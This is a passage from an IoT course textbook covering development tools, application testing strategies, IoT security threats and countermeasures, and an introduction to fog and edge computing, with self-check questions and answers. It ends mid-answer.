
IoT opened many new horizons for companies and developers working for the
development of IoT systems. Many exceptional products have been developed
due to IoT app development. Companies providing Internet of Things solution
are creating hardware and software designs to help the IoT developers to create
new and remarkable IoT devices and applications. Some of the tools to build
IoT prototypes and applications are discussed below:

Arduino

Arduino is an Italy based IT company that builds interactive objects and


microcontroller boards. It is an open-source prototyping platform that offers
both IoT hardware and software. Hardware specifications can be applied to
interactive electronics and software includes Integrated Development
Environment (IDE). It is one of the most preferred IDEs among IoT development
tools. This platform is easy and simple to use.

Raspbian

This IDE is created for Raspberry Pi board. It has more than 35000 packages
and with the help of precompiled software, it allows rapid installation. It was
not created by the parent organization but by the IoT tech enthusiasts. For
working with Raspberry Pi, this is the most suitable IDE available.

Eclipse IoT

This tool or instrument allows the user to develop, adopt and promote open
source IoT technologies. It is best suited to build IoT devices, Cloud platforms,
and gateways. Eclipse supports various projects related to IoT. These projects
include open-source implementations of IoT Protocols, application frameworks
and services, and tools for using Lua programming language which is
promoted as the best-suited programming language for IoT.


Tessel 2

It is used to build basic IoT prototypes and applications. It helps through its
numerous modules and sensors. Using Tessel 2 board, a developer can avail
Ethernet connectivity, Wi-Fi connectivity, two USB ports, a micro USB port,
32MB of Flash, 64MB of RAM. Additional modules can also be integrated
like cameras, accelerometers, RFID, GPS, etc.

Tessel 2 can support Node.js and can use Node.js libraries. It contains two
processors: its hardware uses a 580MHz MediaTek MT7620n processor and a
48MHz Atmel SAMD21 coprocessor. One processor helps to run firmware
applications at high speed and the other helps in the efficient management of
power and in exercising good input/output control.

PlatformIO IDE

It is a cross-platform IoT IDE that comes with an integrated debugger. It is
well suited for mobile app development, and developers can use a friendly IoT
environment for development. A developer can port the IDE onto the Atom
editor or install it as a plugin. It is compatible with more than 400 embedded
boards and has more than 20 development frameworks and platforms. It offers
a remarkable interface and is easy to use.

Kinoma

It is a Marvell semiconductor hardware prototyping platform. It enables three


different projects. To support these projects, two products are available: Kinoma
Create and Element Board. Kinoma Create is a hardware kit for prototyping
electronic and IoT enabled devices. Kit contains supporting essentials like
Bluetooth Low Energy (BLE), integrated Wi-Fi, speaker, microphone and
touch screen. Element Board is the smallest JavaScript-powered IoT product
platform.

10.6 IoT APPLICATION TESTING STRATEGIES

Testing is a very important phase after application development is completed.
The following are the essential types of tests (as shown in Figure 2)
recommended for an IoT application.

Figure 2: IoT Application Testing Strategies

10.6.1 Performance Testing

Performance testing is usually conducted to determine how fast a
communication network model functions. This testing also looks into the
computational capabilities of the internals of the software system.

This IoT Performance testing framework is usually done at 3 levels:

 The Network and Gateway level, which involves protocols such as


HTTP and MQTT
 The System level
 The Application level

A good example of Performance IoT testing is the verification of response time


against a specific bench-marked time, with specifically defined connectivity
settings.
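
A minimal sketch of such a response-time check, written in Python with the requests library, is given below. The gateway URL and the 500 ms benchmark are illustrative assumptions.

import time
import requests

BENCHMARK_SECONDS = 0.5                            # agreed response-time budget

def test_status_endpoint_response_time():
    start = time.monotonic()
    response = requests.get("http://gateway.local/status", timeout=5)
    elapsed = time.monotonic() - start
    assert response.status_code == 200
    assert elapsed < BENCHMARK_SECONDS, f"too slow: {elapsed:.3f}s"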

10.6.2 Security Testing

The security testing aspect of the IoT framework deals with security elements,
such as the protection of data, as well as encryption and decryption. It is aimed
at providing added security to connected devices, and also to the networks and
cloud services on which the devices are connected.

Some variables that mostly cause security threats in IoT are sensor networks,
applications that work to collect data, and interfaces. Therefore, it is highly
recommended that security testing be done at the device and protocol level,
since problems can easily be detected and solved at this level.

An example of security testing is the verification of no unauthorized access to


a particular device.
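
The same idea can be expressed as a small automated check: a request sent without credentials must be rejected. The endpoint below is an illustrative assumption about how the device exposes its configuration.

import requests

def test_rejects_unauthenticated_request():
    response = requests.get("http://gateway.local/api/v1/config")   # no token supplied
    assert response.status_code in (401, 403), \
        "device served a protected resource without authentication"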
10.6.3 Compatibility Testing

The main purpose of compatibility testing is to validate all the possible


functional combinations of devices, their hardware, protocol and software
versions, as well as operating systems, such as the mobile OS versions.
This compatibility testing is usually done in two levels:

 The Application layer


 The Network layer

A good example of compatibility testing is verifying that a particular IoT


software supports a given set of devices.

10.6.4 End-User Application Testing

The End-user application testing takes into consideration the user experience,
as well as the usability and functionality of the IoT application.

An example of this IoT testing framework is the verification of an IoT


application, so as to ensure that it includes all required features, and in a good
working condition as well.

10.6.5 Device Interoperability Testing

This type of testing aims to assess the interoperability of protocols and devices,
compared with varying standards and specifications.

In other words, in an IoT framework, the device interoperability testing is


conducted so as to verify the connectivity of all devices and protocols.

This testing is usually done in the Service layer. This is because the service
layer provides the most conducive environment for this testing, that is; a
platform that is communicable, programmable and operable.

10.7 SECURITY ISSUES IN IoT

The IoT differs from traditional computers and computing devices, which
makes it more vulnerable to security challenges in several ways:

 Many devices in the Internet of Things are designed for deployment on


a massive scale. An excellent example of this is sensors.
 Usually, an IoT deployment comprises a set of alike or nearly
identical appliances that bear similar characteristics. This similarity
amplifies the magnitude of any security vulnerability, which may
significantly affect many of them.
 Similarly, many institutions have come up with guides for conducting
risk assessments. Even so, the probable number of interconnected links
between IoT devices is unprecedented. It is also clear that many of
these devices can establish connections and communicate with other
devices automatically in an irregular way. These call for consideration
of the accessible tools, techniques, and tactics related to the security
of IoT.

Even though security is not a new issue in the information technology sector,
IoT implementation has presented unique challenges that need to be addressed.
Consumers need to be able to trust that IoT devices and the related services are
secure from weaknesses, particularly as this technology becomes more
pervasive and integrated into our everyday lives. Weakly protected IoT devices
and services are one of the most significant avenues for cyber attacks and for
the exposure of user data through inadequately protected data streams. The
interconnected nature of IoT devices means that a poorly secured connected
device can affect the security and resilience of the Internet globally. This is
aggravated by the mass deployment of homogeneous IoT devices and by the
ability of some devices to automatically connect to other devices; it means that
IoT users and developers all have an obligation to ensure that they do not
expose other users, or the Internet itself, to potential harm. A shared approach
is required to develop an effective and appropriate solution to the security
challenges currently witnessed in the IoT.

When it comes to authentication, for instance, IoT faces various vulnerabilities,
and authentication remains one of the most significant issues in providing
security in many applications. The authentication used is often limited in that
it protects against only one threat, such as Denial of Service (DoS) or replay
attacks. Information security is one of the most vulnerable areas in IoT
authentication due to the prevalence of risky applications that naturally collect
a multiplicity of data in the IoT environment. Consider, for instance,
contactless credit cards. These cards permit card numbers and names to be
read without authentication; this makes it possible for hackers to purchase
goods using the cardholder's bank account number and identity.

One of the most prevalent attacks in the IoT is the man-in-the-middle attack,
where a third party hijacks the communication channel in order to spoof the
identities of the legitimate nodes involved in the network exchange. A
man-in-the-middle attack can effectively make a bank server recognize a
transaction as a valid event, since the adversary does not even need to know
the identity of the supposed victim.

In this section let us discuss the security issues layer-wise in an IoT


Architecture. IoT systems can be broadly described using a basic three layer
architecture namely Perception layer, Gateway layer and Cloud layer.

Perception layer: The Perception layer is the typical external physical layer,
which includes sensors for sensing and gathering information about the
surrounding environment, such as temperature, humidity and pressure. Table 1
shown below depicts the major threats in the Perception layer:
Table 1: Threats in the Perception Layer

Denial of Service Attack: IoT sensing nodes have limited capacity and
capabilities, thus attackers can use a Denial of Service attack to stop the
service. Eventually the servers and the devices will be unable to provide their
service to users.

Hardware Jamming: An attacker can damage a node by replacing parts of the
node hardware.

Insertion of Forged Nodes: An attacker can insert a falsified or malicious node
between the actual nodes of the network to get access to and control over the
IoT network.

Brute Force Attack: As the sensing nodes have weaker computational power,
a brute force attack can easily compromise the access control of the devices.

Gateway layer: The Gateway layer is responsible for connecting to network


devices, interconnected smart devices and servers. Its features are also used for
transmitting and processing sensor data. Table 2 shown below depicts the
major threats in the Gateway layer:
Table 2: Threats in the Gateway Layer

Denial of Service Attack: As this layer provides network connectivity,
following a DoS attack the servers or devices are unable to provide services to
the user.

Session Hijacking Attacks: Attackers can hijack a session and obtain access to
the network through this kind of attack.

Man in the Middle (MIM) Attacks: An attacker can intercept the
communication channel between two sensing nodes and easily obtain
classified information if there is no proper encryption mechanism in place.

Cloud layer: The IoT Cloud layer represents the back-end services required to
set up, manage, operate, and extract business value from an IoT system. It
delivers the application-specific services to the user so they can operate and
monitor the devices. Table 3 shown below depicts the major threats in the
Cloud layer:

Table 3: Threats in the Cloud Layer

Data security in cloud computing: All the data that is collected will be
processed and stored on the cloud; the cloud service provider holds the
responsibility of protecting this data.

Application layer attacks: Most applications are hosted on the cloud as
Software as a Service and delivered through web services, so an attacker can
easily manipulate the application layer protocols and get access to the IoT
network.

An attack on Virtual Machines: Security of cloud virtual machines is very
important, and any security breach can cause the failure of the entire IoT
environment.

10.7.1 Counter Measures


A basic IoT system requires the following to be fulfilled in order to become a
secure system.

 Authentication
 Authorization
 Confidentiality
 Integrity
 Non Repudiation

Authentication verifies the identity of a user or a device in an IoT system.
Authorization checks what privileges the authenticated entity possesses to
execute on the system. Confidentiality and data integrity make sure that the
data is encrypted so that no one can tamper with it, either in storage or during
transmission. Non-repudiation assures the authenticity of the origin source of
the data as well as its integrity. Exploiting an IoT system means compromising
any of the aforementioned security attributes, so countermeasures must be in
place before they are compromised.
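
As a small illustration of the integrity and origin-authenticity attributes, the Python sketch below signs a reading with an HMAC using only the standard library. The shared key shown is a placeholder; in practice it would be provisioned securely per device.

import hashlib
import hmac
import json

SECRET_KEY = b"per-device-provisioned-key"         # illustrative placeholder only

def sign(payload):
    """Compute an HMAC-SHA256 tag over a canonical JSON encoding of the payload."""
    message = json.dumps(payload, sort_keys=True).encode()
    return hmac.new(SECRET_KEY, message, hashlib.sha256).hexdigest()

def verify(payload, signature):
    """Constant-time comparison of the received tag against a fresh one."""
    return hmac.compare_digest(sign(payload), signature)

reading = {"device_id": "sensor-01", "temperature_c": 22.4}
tag = sign(reading)
print(verify(reading, tag))                        # True: data has not been tampered with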

The Open Web Application Security Project (OWASP) has released the latest
vulnerabilities that target IoT devices; the following is the current ranked list
of the top issues and things to avoid:

 Weak, guessable, or hardcoded passwords


 Insecure network services
 Insecure ecosystem interfaces
 Lack of secure update mechanism
 Use of insecure or outdated components
 Insufficient privacy protection
 Insecure data transfer and storage
 Lack of device management
 Insecure default settings
 Lack of physical hardening

Table 4 below depicts what we can do to improve security in terms of the
authentication, authorization, confidentiality, data integrity and
non-repudiation security attributes.
Table 4: Countermeasures to Improve Security

Authentication and Authorization: use security credentials and identity and
access management methods. Identification of users and devices needs to be
done, and strong security credentials need to be configured for the devices by
removing the default credentials.

Confidentiality: use an appropriate encryption mechanism (devices may have
less computational power). Data must be encrypted so that only authorized
users can access it.

Data integrity: use hashing techniques. Non-tampering of data can be assured
by various hashing techniques.

Non-repudiation: use digital signatures. The origin source of the data can be
assured by using digital signatures.

 Check Your Progress 1

1) Compare and contrast various IoT platforms discussed in this unit with
reference to the parameters like services availability and device
management platform.

…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
2) What are the various factors and concerns those might have an impact on
compromising the efforts to secure the IoT devices?

…………………………………………………………………………………
…………………………………………………………………………………
3) Explore and write various current innovative techniques to mitigate the
security attacks.
…………………………………………………………………………………
…………………………………………………………………………………

10.8 SUMMARY

In this unit we have studied essential requirements for IoT Application


development, challenges of IoT Application development, IoT Application
Development Frameworks, Open Source platforms for developing IoT
applications, Tools for designing and developing IoT application prototypes,
IoT application testing strategies and the security issues in IoT systems.

10.9 SOLUTIONS / ANSWERS

Check Your Progress 1

1. A comparison of various open-source IoT platforms is summarized below in
Table 5:

Table 5: Comparison between various open source IoT Platforms

KAA IoT: supports various hardware types, device management, reliable data
collection, configuration management, support for various integrations,
command execution, and connecting devices directly or via gateways. Device
management platform: Yes.

MACCHINA.io: secure web access to IoT devices from anywhere, remote
control of IoT devices with apps and voice assistants, secure remote
management via shell and desktop (VNC & RDP). Device management
platform: Yes.

ZETTA: runs everywhere, turns every thing into an API, supports almost all
device protocols. Device management platform: No.

DeviceHive: provides end-to-end solutions, consulting and commercial
support, device enablement, etc. Device management platform: No.

DSA (Distributed Services Architecture): provides an open-source Apache 2.0
licensed implementation of a DSBroker written in Dart. Device management
platform: No.

2. Given below are various factors and concerns that might compromise the
efforts to secure IoT devices:

Occasional update: usually, IoT manufacturers update security


patches quarterly. The OS versions and security patches are also
upgraded similarly. Therefore, hackers get sufficient time to crack the
security protocols and steal sensitive data.

Embedded passwords: IoT devices store embedded passwords, which
help the support technicians to troubleshoot OS problems or install
necessary updates remotely. However, hackers could utilize this feature
for penetrating device security.

Automation: often, enterprises and end-users utilize the automation


property of IoT systems for gathering data or simplifying business
activities. However, if the malicious sites are not specified, integrated
AI can access such sources, which will allow threats to enter into the
system.

Remote access: IoT devices utilize various network protocols for


remote access like Wi-Fi, ZigBee, and Z-Wave. Usually, specific
restrictions are not mentioned, which can be used to prevent
cybercriminals. Therefore, hackers could quickly establish a malicious
connection through these remote access protocols.

Wide variety of third-party applications: several software


applications are available on the Internet, which can be used by
organizations to perform specific operations. However, the authenticity
of these applications could not be identified easily. If end-users and
employees install or access such applications, the threat agents will
automatically enter into the system and corrupt the embedded database.

Improper device authentication: most of the IoT applications do not


use authentication services to restrict or limit network threats. Thereby,
attackers enter through the door and threaten privacy.

Weak Device monitoring: usually, all the IoT manufacturers configure


unique device identifiers to monitor and track devices. However, some
manufacturers do not maintain security policy. Therefore, tracking
suspicious online activities become quite tricky.

3. Some of the current innovative techniques to mitigate the security


attacks are:

Deploying encryption techniques: Enforcing strong and updated


encryption techniques can increase cybersecurity. The encryption
protocol implemented in both the cloud and device environments. Thus,
hackers could not understand the unreadable protected data formats and
misuse it.

Constant research regarding emerging threats: The security risks


are assessed regularly. Organizations and device manufacturers
developed various teams for security research. Such teams analyze the
impact of IoT threats and develop accurate control measures through
continuous testing and evaluation.

Increase the updates frequency: The device manufacturers should


develop small patches rather than substantial updates. Such a strategy
can reduce the complexity of patch installation. Besides, frequent
updates will help users avert cyber threats from diverse sources.

Deploy robust device monitoring tools: Most of the recent research


proposed to implement robust device monitoring techniques so those
suspicious activities can be tracked and controlled easily. Many IT
organizations introduced professional device monitoring tools to detect
threats. Such tools are quite useful for risk assessment, which assists
the organizations in developing sophisticated control mechanisms.

Develop documented user guidelines to increase security


awareness: Most of the data breaches and IoT attacks happen due to a
lack of user awareness. Usually, IoT security measures and guidelines
are not mentioned while users purchase these devices. If device
manufacturers specify the potential IoT threats clearly, users can avoid
these issues. Organizations can also design effective training programs
to enhance security consciousness. Such programs guide users to
develop strong passwords to update them regularly. Besides, users are
instructed to update security patches regularly. The users also taught
and requested to avoid spam emails, third-party applications, or
sources, which can compromise IoT security.

10.10 FURTHER READINGS

1. Internet of Things, Jeeva Jose, Khanna Publishing, 2018.


2. Internet of Things - A Hands-on Approach, Arshdeep Bahga and Vijay
Madisetti, Universities Press, 2015.
3. IoT Fundamentals: Networking Technologies, Protocols and Use Cases
for the Internet of Things, Hanes David, Salgueiro Gonzalo, Grossetete
Patrick, Barton Rob, Henry Jerome, Pearson, 2017.
4. Designing the Internet of Things, Adrian Mcwen, Hakin Cassimally,
Wiley, 2015.

UNIT 11 FOG COMPUTING AND EDGE COMPUTING

11.1 Introduction
11.2 Objectives
11.3 Introduction to Fog Computing
11.4 Cloud Computing Vs Fog Computing
11.5 Fog Architecture
11.6 Working of Fog
11.7 Advantages of Fog
11.8 Applications of Fog
11.9 Challenges in Fog
11.10 Edge Computing
11.11 Working of Edge Computing
11.12 Cloud Vs Fog Vs Edge Computing
11.13 Applications of Edge Computing
11.14 Summary

11.1 INTRODUCTION

Use of emerging technologies like IoT, online applications and the popularity of social networking are
leading to an increasing number of users on the internet. Hence, the data generated on a daily basis is also
increasing at an enormous rate, leading to an increasing workload on the cloud. Demand for higher
bandwidth and the need for real-time applications and analytics are also growing. Fog computing is a
technology introduced to collaborate with cloud computing in providing solutions. It attempts to bring
cloud-like resources – memory, storage, and compute – near end users.

11.2 OBJECTIVES

After going through this unit, you should be able to:

 Know about Fog computing technology


 Know about the differences between fog and cloud computing
 Know about architecture, advantages, applications and challenges associated with fog
 Know about Edge computing
 Differentiate between Cloud, Fog and Edge computing
 Know about Applications of Edge computing

11.3 INTRODUCTION TO FOG COMPUTING

With the increasing use of Internet of Things (IoT) devices and the growing number of internet users,
network traffic, storage and processing load are also increasing at an exponential rate. Cisco estimated in
2020 that by the end of 2023 there would be 29.3 billion connected devices and 5.3 billion internet users.

Cloud computing technology offers computation service over the internet on a pay-per-use basis.
Resources offered by this technology like – storage, compute or network can be dynamically provisioned
according to user’s demand. This technology offers several advantages like – low cost, rapid
provisioning, high computation power, flexible, automatic updates, no management or monitoring needed
from user’s side, etc. Enormous amounts of data generated by IoT devices and users can be stored and
processed on cloud servers. But in addition to these benefits, there are several shortcomings associated
with this technology – like increased response time due to distant location of servers and centralized
architecture, security as resources are remotely stored and provided over insecure internet, demand of
higher network bandwidth, increasing load on network due to further increasing users.

Cisco in 2014 introduced the term 'Fog Computing' for a technology which extends computing to the
edge of the network. The fog metaphor represents a cloud close to the ground, just as fog computing
concentrates at the edge of the network.

Fog computing is a technology in which resources like - compute, data, storage and applications are
located in-between the end user layer (where data is generated) and the cloud. Devices like gateways,
routers, base stations can be configured as fog devices. It can bring all the advantages offered by cloud
computing closer to the location where data is generated; hence leading to reduced response time, reduced
bandwidth requirements, enhanced security and other benefits.

OpenFog Consortium defined fog computing as “a horizontal system level architecture that distributes
computing, storage, control and networking functions closer to the users along a cloud-to-thing
continuum”.

Fog computing is not introduced to replace cloud computing. Resources offered by Fog servers or devices
are limited as compared to resources offered by huge cloud infrastructure. Hence the cloud computing
model will continue to operate as a centralized computing system (needed for high processing power and
storage) with few capabilities shifted towards fog devices which are present in the proximity of users for
serving low latency operations.

The three-layer logical architecture of fog computing is given in Fig 1. The first layer represents the end
devices, the middle layer represents the fog devices, and the topmost layer represents the cloud servers.

Fig 1. Logical Architecture of Fog computing

11.4 CLOUD COMPUTING Vs FOG COMPUTING

Cloud computing is defined as a model that allows ubiquitous access to shared resources on demand over
the internet on a pay-per-use basis. Large pools of resources are maintained at data centers by the cloud
service providers. Virtual resources from these pools are dynamically provisioned and allocated to users
on demand. High performance can be achieved by using cloud resources but it may not be used for real
time applications that demand higher response time due to the distant location of cloud servers.

Fog computing is introduced to fill up the gap between the cloud servers and end devices. Fog servers like
cloud servers can offer various resources – compute, storage, or network. Due to its proximity to end
users, it allows computations to be done faster or near real time. Hence it is better suited for latency
sensitive applications. Since fog computing makes use of devices like- switches, routers, gateways; it is
generally limited by resources and hence offers less computation power as compared to cloud.

Some of the differences between cloud computing and fog computing are given in Table 1.

Cloud Computing | Fog Computing

Architecture is centralized | Architecture is distributed
Distant location from the end users | In the proximity of end users
Huge amount of resources | Limited amount of resources
Higher computation capabilities | Lower computation capabilities
More response time | Less response time
Can be accessed over the internet | Can be accessed by various protocols and standards
Less security | More security

Table 1: Differences between Cloud Computing and Fog Computing

11.5 FOG ARCHITECTURE

General architecture of fog computing is composed of three layers (as shown in Fig 1.)

1. End Devices Layer - Layer 1 is composed of end devices which can be mobile devices, IoT
devices, computer systems, camera, etc. Data either captured or generated from these end
devices is forwarded to a nearby fog server at Layer 2 for processing.

2. Fog Layer - Layer 2 is composed of multiple fog devices or servers. They are placed at the
edge of a network, between layer 1 and cloud servers. They can be implemented in devices like –
switches, routers, base stations, access points or can be specially configured fog servers.

3. Cloud Layer - Layer 3 is composed of Cloud data centers. They consist of huge
infrastructure - high performance servers, massive storage devices, etc. They provide all cloud
benefits like- high performance, automatic backup, agility.

Check Your Progress 1

1. What is Fog computing?


2. Explain differences between Cloud computing and Fog computing.
3. Explain architecture of Fog computing.

11.6 WORKING OF FOG

Adding fog layer in-between the centralized cloud layer and end devices layer, improves the overall
performance of the system. Working of fog computing in collaboration with cloud computing is described
below.

1. Huge amounts of data is generated from end devices and IoT devices like –mobile, camera,
laptops, etc. This data is then forwarded to the nearest fog server (in layer 2) for processing.

2. Latency sensitive data or applications that require real time responses, are processed by the fog
servers on priority basis. Results of processing or actions to be performed are then reverted
back to the end devices. Fog servers also send the summarized results to cloud servers in layer
3 for future analysis. This allows only filtered data to be offloaded to the cloud layer.

3. Fog servers, if not able to serve requests due to unavailability of resources or information, can
either interact with neighbouring servers or forward the request to cloud servers at Layer 3,
depending upon the offloading strategy. Also, time-insensitive data is generally forwarded to
cloud servers for processing and storage. After serving the task, the response is given to users at
layer 1 via the fog servers.
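
A minimal Python sketch of the prioritisation described above is given below. The handler functions are placeholders for real processing and transport code, and the latency_sensitive flag is an assumed attribute of the incoming event.

def handle_at_fog_node(event, process_locally, send_to_cloud):
    """Serve latency-sensitive events locally; offload the rest to the cloud."""
    if event.get("latency_sensitive"):
        result = process_locally(event)            # act in (near) real time at the fog layer
        send_to_cloud({"summary": result})         # offload only the filtered summary
        return result
    # Time-insensitive data is simply forwarded for storage and batch analysis.
    send_to_cloud(event)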

11.7 ADVANTAGES OF FOG

There are various advantages of using fog computing technology due to its architecture-

1. Low latency
Fog servers provide the benefit of faster response due to its geographical location i.e. they are
located nearby from the point of data origination. It is suited for time sensitive or real-time
applications.

2. Reduce bandwidth requirements


Fog servers allow lower bandwidth consumption because data gets processed at nearby fog
servers, hence avoiding huge amounts of data to be forwarded to distant cloud servers for
processing.

3. Reduced Cost
Most of the processing is done locally at the fog layer, leading to conservation of networking
resources and hence reducing the overall cost of operations.

4. Security and Privacy

It also allows applications to be secure and private because data can be processed locally instead
of forwarding to remote centralized cloud infrastructure.

5. Mobility
Fog devices are mobile. They can be easily added or removed from the network and hence offers
flexibility.

11.8 APPLICATIONS OF FOG

Fog computing since its introduction, is gaining popularity due to its applications in various industries.
Some of the applications are –

Smart Cities

Cities that make use of technology to improve quality of life and services provided to people, can be
called smart cities. Fog computing can play a vital role in building smart cities. With the help of smart
devices, IoT devices and fog devices, it is possible to do tasks like – creating smart homes and buildings
by energy management of buildings, maintaining security, etc; intelligent cities by building smart parking
system, infrastructure, traffic management, environment monitoring, etc ; intelligent hospitals, highways,
factories, etc.

Fig 2: Smart Cities Scenario


Source: www.OpenFogConsortium.org

Smart Car and Traffic Control System


By making use of IoT devices and ubiquitous fog devices, vehicle-to-vehicle (V2V) and vehicle-to-infrastructure (V2I) communication is possible. Vehicles can communicate with internal as well as external environments with the help of sensors. Sensors and actuators can also be attached to infrastructure along the roadside, such as traffic lights, street boards and gates. Sensors can forward the collected data to fog devices, which may be either attached to the vehicle or present at a nearby location. Fog devices, after computation, can direct the vehicle or the infrastructure to take action with the help of various controls (actuators). For example, on detecting vehicles coming from the wrong direction or approaching pedestrians, a traffic light may turn red to avoid collisions, or other vehicles may automatically be directed to apply brakes.

Fig 3: Smart car and Traffic control system scenario


Source: www.OpenFogConsortium.org

Smart Grids

The electrical grid is a network which delivers energy generated from various sources to consumers. Efficient distribution of this energy is possible by making use of fog computing. IoT sensors can monitor the energy generated from various sources, like wind farms, thermal plants and hydroelectric plants. This data is then passed on to a nearby fog server to identify the optimal source of energy to be used; the fog server can also identify problems like equipment malfunctions and, depending upon the problems, may identify alternative sources of energy to be used in order to maintain efficiency.

Fig 4: Smart Grid

Smart Healthcare Systems

Fog computing has applications in the healthcare system as well. Health data of patients can be recorded using different types of sensors and forwarded to fog devices. Fog devices, after performing analysis (for example, diagnosing cardiac diseases), can take the necessary actions.

Surveillance

Security and surveillance cameras are deployed in many areas. It is difficult to send the massive amounts of data collected by these cameras to cloud servers due to bandwidth constraints. Hence, the data collected can be forwarded to nearby fog servers. The fog servers, in turn, can perform video processing to detect incidents like theft, kidnapping or murder, or to find missing people. Necessary action can then be taken by generating alerts or reporting to police stations.

11.9 CHALLENGES IN FOG

Fog computing offers several advantages, but there are several challenges associated with it. Some of
them are –

1. Complexity

Fog devices can be diverse in architecture and are located at different places. Each fog device further stores and analyses its own data, which adds more complexity to the network.

2. Power Consumption

Fog devices require high power for proper functioning. Adding more fog devices increases energy consumption, which results in an increase in cost.

3. Data Management

Data is distributed across multiple fog devices hence data management and maintaining
consistency is challenging.

4. Authentication

Establishing trust and authentication may raise issues.

5. Security

Since there are many fog devices, each with a different IP address, protecting personal data from being accessed through spoofing, tapping and hacking is a challenge.

Check Your Progress 2

1. Explain advantages and challenges associated with fog computing.


2. What are the various application areas of fog computing?

11.10 EDGE COMPUTING

Edge computing is a technology which offers data processing on the same layer where the data is generated, by making use of edge devices that have computation capabilities. This allows data to be processed even faster than at fog devices, at no or very low cost. It also increases the utilization of edge devices.

Edge or end devices found today are smarter, with various advanced features like artificial intelligence enabled in them. Edge computing takes advantage of this intelligence to reduce the load on the network or cloud servers. Edge devices used for computation also offer hardware security along with low power consumption, and security can be improved further by encrypting data at the edge, before it travels towards the network core.

Edge computing is often seen as similar to fog computing, but there are several differences. Edge computing devices are limited in their resource capabilities and therefore cannot replace existing cloud or fog computing technology. But edge computing, when combined with these technologies, can offer numerous advantages and applications. Fig 5 shows the Cloud-Fog-Edge collaboration scenario.

Fig 5: Cloud – Fog – Edge Computing architecture

11.11 WORKING OF EDGE COMPUTING

Edge computing allows data processing to be done at the network edge. This offers several advantages: it decreases latency, reduces the amount of data to be offloaded to the cloud or fog, reduces bandwidth costs, reduces energy consumption, etc.

Edge computing can work in collaboration with cloud computing alone, or it can be implemented within a Cloud-Fog collaboration environment.

Instead of sending all the data directly to the cloud or fog layer from the edge devices, the data is first processed at the edge layer. Processing data at the edge layer gives a near real-time response due to the physical proximity of the edge devices. As the data generated at the edge layer is huge, it cannot be handled entirely there and is therefore offloaded to the cloud or fog layer. In the Cloud-Fog-Edge collaboration scenario, data from the edge layer is first offloaded to fog servers over a localized network, which in turn can offload it to cloud servers for updates or further processing. In the Cloud-Edge scenario, data, after processing at the edge layer, can be offloaded to the cloud layer, since the resources available at the edge are insufficient to handle large amounts of data. In either case, the edge layer can decide what is relevant and what is not before sending data to the further layers, hence reducing the load on cloud and fog servers.
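The "decide what is relevant before offloading" idea can be illustrated with a small sketch. The readings, baseline and tolerance below are invented values; a real edge device would obtain them from its attached sensors and configuration.

def filter_readings(readings, baseline, tolerance=2.0):
    # keep only readings that deviate noticeably from the baseline;
    # everything else is handled (and discarded) at the edge layer
    return [r for r in readings if abs(r - baseline) > tolerance]

samples = [24.9, 25.1, 25.0, 31.4, 24.8]           # e.g. temperature samples at an edge device
to_offload = filter_readings(samples, baseline=25.0)
print("Forward to fog/cloud:", to_offload)          # only the anomalous reading 31.4 is sent up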

11.12 CLOUD Vs FOG Vs EDGE COMPUTING

Cloud, fog and edge computing are all concepts of distributed computing. All of them perform computation, but at different proximity levels and with different resource capacities. Adding edge and fog layers to the cloud reduces the amount of storage needed at the cloud. Data can be transferred at a faster rate because only relevant data is transferred, and the cloud stores and processes only that relevant data, resulting in cost reduction.

Edge computing devices are located at the closest proximity to users. Fog computing devices are located
at intermediate proximity. Cloud computing devices are at distant and remote locations from users. Fog
computing generally makes use of a centralized system which interacts with gateways and computer
systems on LAN. Edge computing makes use of embedded systems directly interfacing with sensors and
controllers. But this distinction does not always exist. Some of the common differences between Cloud,
Fog and Edge computing are shown in Table 2.

Cloud Computing | Fog Computing | Edge Computing
Centralized approach | Distributed approach | Distributed approach
Large amount of resources | Intermediate amount of resources | Limited resources
High latency | Medium latency | Low latency
Low data rate | Medium data rate | High data rate
Globally distributed | Regionally distributed | Locally distributed
Non-real time response | Near real time response | Real time response
Can be accessed with internet | Can be accessed with or without internet | Can be accessed without internet

Table 2: Differences between Cloud, Fog and Edge Computing

11.13 APPLICATION OF EDGE COMPUTING

Edge computing has applications similar to fog computing due to its close proximity. Some of the
applications are listed below.

1. Gaming
Games that require a live streaming feed depend heavily on latency. Here, edge servers are placed close to the gamers to reduce latency.

2. Content Delivery
Content such as web pages and videos can be cached near users in order to improve performance by delivering it quickly.

3. Smart Homes
IoT devices can collect data from around the house and process it. The response generated is secure and in real time, as the round-trip time is reduced; for example, the responses generated by Amazon’s Alexa.

4. Patient monitoring
Edge devices present on the hospital site can process data generated from various monitoring
devices like- temperature sensors, glucose monitors etc. Notifications can be generated to depict
unusual trends and behaviours.

5. Manufacturing
Data collected in manufacturing industries through sensors can be processed in edge devices.
Edge devices here can apply real time analytics and machine learning techniques for reporting
production errors to improve quality.

Check Your Progress 3

1. What is edge computing?


2. Explain differences between cloud, fog and edge computing.
3. State some of the applications of edge computing.

11.14 SUMMARY

In this unit two emerging technologies – Fog computing and Edge computing are discussed. Cisco
introduced Fog Computing as a technology which extends computing to the edge of the network. In this
technology, resources like - compute, data, storage and applications are located in-between the end user
layer and the cloud. It reduces response time, reduces bandwidth requirements and enhances security.
Edge computing is a technology which offers data processing on the same layer where data is generated
by making use of edge devices having computation capabilities. These technologies cannot replace cloud
computing but can work in collaboration with cloud computing in order to improve performance.

Solutions to Check your progress 1

1. Cisco, in 2014, introduced the term ‘Fog Computing’ for a technology which extends computing to the edge of the network. Fog computing is a technology in which resources like compute, data, storage and applications are located in-between the end-user layer (where data is generated) and the cloud. Devices like gateways, routers and base stations can be configured as fog devices. Fog computing brings the advantages offered by cloud computing closer to the location where data is generated, leading to reduced response time, reduced bandwidth requirements, enhanced security and other benefits.

2. Some of the differences between cloud computing and fog computing are :-

Cloud Computing | Fog Computing
Architecture is centralized | Architecture is distributed
Distant location from the end users | In the proximity of end users
Huge amount of resources | Limited amount of resources
Higher computation capabilities | Lower computation capabilities
More response time | Less response time
Less security | More security

3. Architecture of fog computing is composed of three layers :-

1. End Devices Layer – It is composed of end devices which can be mobile devices, IoT
devices, computer systems, camera, etc. Data either captured or generated from these end
devices is forwarded to a nearby fog server at Layer 2 for processing.

2. Fog Layer – It is composed of multiple fog devices or servers. They are placed at the edge
of a network, between layer 1 and cloud servers. They can be implemented in devices like –
switches, routers, base stations, access points or can be specially configured fog servers.

3. Cloud Layer – It is composed of Cloud data centers. They consist of huge infrastructure -
high performance servers, massive storage devices, etc. They provide all cloud benefits like- high
performance, automatic backup, agility.

Solutions to Check your progress 2

1. Various advantages associated with fog computing are –


a) Low latency
